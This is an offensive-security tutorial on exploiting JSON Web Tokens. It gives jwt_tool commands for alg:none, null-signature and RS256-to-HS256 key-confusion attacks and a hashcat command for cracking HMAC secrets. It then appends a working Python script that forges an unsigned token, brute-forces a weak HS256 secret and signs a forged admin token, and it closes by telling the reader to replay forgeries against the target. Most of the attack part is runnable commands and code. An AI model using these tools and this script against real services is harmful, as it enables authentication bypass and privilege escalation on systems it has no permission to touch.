How to exploit JSON Web Tokens.
jwt_tool is a good first pass for finding issues in JSON Web Tokens. It helps identify the following:
The JWT uses a symmetric signing algorithm (HS256), so the shared secret can be brute-forced offline and then used to forge tokens
The JWT carries sensitive data in its payload, which is only base64url-encoded, not encrypted
The JWT does not expire (no exp claim), so a leaked token stays valid indefinitely
The JWT is accepted with a NULL signature or alg set to none, i.e. it is effectively unsigned
RS256 to HS256 algorithm confusion: the server trusts the alg header and verifies an HS256 token using its own RSA public key as the HMAC secret
python3 jwt_tool.py <JWT> -X a
The -X a option runs the alg:none exploit and prints a token you can replay. Other exploit modes follow the same pattern, e.g. -X n for the null signature and -X k together with -pk public.pem for RS256 to HS256 key confusion; -M pb runs the full playbook scan instead of a single exploit.
https://github.com/ticarpi/jwt_tool/
Use the following command to crack the secret of an HMAC-signed JWT (HS256, HS384 or HS512). Hashcat mode 16500 is the JWT mode; the --backend-ignore-cuda flag is optional and only silences CUDA warnings.
hashcat.exe -m 16500 JWT.txt rockyou.txt --backend-ignore-cuda
JWT.txt should contain your JWT on a single line.
Various password wordlists can be used; rockyou.txt is one example. On success hashcat prints the token followed by the recovered secret, and that secret lets you sign tokens with arbitrary claims. Tokens signed with RS256 or another asymmetric algorithm cannot be cracked this way; for those, check for the algorithm-confusion and alg:none issues above.
https://hashcat.net/hashcat/
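To make the checks above and the cracking step concrete, here is an added example (not part of the original page or of jwt_tool or hashcat) written with only the Python standard library. It audits a token for the issues jwt_tool reports (symmetric alg, missing exp, sensitive claims, alg:none), forges an unsigned alg:none token, recovers a weak HS256 secret from a small wordlist the same way hashcat mode 16500 does, and then signs a forged admin token with the recovered secret. The token, the secret "password123", the claim names treated as sensitive and the wordlist are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, Iterable, List, Optional

# Claim names treated as "sensitive data"; a constructed list for this example.
SENSITIVE_CLAIMS = {"password", "passwd", "secret", "ssn", "credit_card", "api_key"}


def b64url_encode(data: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Restore padding before decoding a JWT segment."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: Dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: Dict, payload: Dict, secret: bytes) -> str:
    """Build header.payload and append an HMAC-SHA256 signature."""
    signing_input = encode_segment(header) + "." + encode_segment(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> bool:
    """Recompute the HMAC over header.payload and compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret, (header_b64 + "." + payload_b64).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def split_token(token: str):
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def audit(token: str) -> List[str]:
    """Report the weaknesses listed on the page, without contacting any server."""
    header, payload, sig = split_token(token)
    findings = []
    alg = header.get("alg")
    if alg in ("HS256", "HS384", "HS512"):
        findings.append(f"symmetric alg {alg}: secret can be brute-forced offline")
    if alg is None or str(alg).lower() == "none" or sig == "":
        findings.append("alg none / empty signature: token is unsigned")
    if "exp" not in payload:
        findings.append("no exp claim: token never expires")
    leaked = sorted(k for k in payload if k.lower() in SENSITIVE_CLAIMS)
    if leaked:
        findings.append("sensitive claims in payload: " + ", ".join(leaked))
    return findings


def forge_alg_none(token: str, changes: Dict) -> str:
    """Rewrite alg to none, change claims, and leave the signature empty."""
    header, payload, _ = split_token(token)
    header["alg"] = "none"
    payload.update(changes)
    return encode_segment(header) + "." + encode_segment(payload) + "."


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on the HS256 secret: what hashcat -m 16500 does at scale."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = (header_b64 + "." + payload_b64).encode()
    target = b64url_decode(sig_b64)
    for word in wordlist:
        candidate = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(candidate, target):
            return word
    return None


# Constructed sample: a weak secret, a payload with no exp and a leaked password.
SAMPLE_SECRET = b"password123"
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"sub": "alice", "role": "user", "password": "hunter2"},
                          SAMPLE_SECRET)
WORDLIST = ["123456", "letmein", "qwerty", "password123", "admin"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    for finding in audit(SAMPLE_TOKEN):
        print("finding:", finding)
    print("alg:none forgery:", forge_alg_none(SAMPLE_TOKEN, {"role": "admin"}))
    secret = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", secret)
    if secret:
        admin = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "admin"}, secret.encode())
        print("forged admin token verifies:", verify_hs256(admin, SAMPLE_SECRET))
```

Whether the alg:none forgery is accepted depends entirely on the server's verifier, so replay it against the target and compare responses, as jwt_tool's -X a does; the cracking step, by contrast, needs no interaction with the target and is where a GPU and a real wordlist pay off.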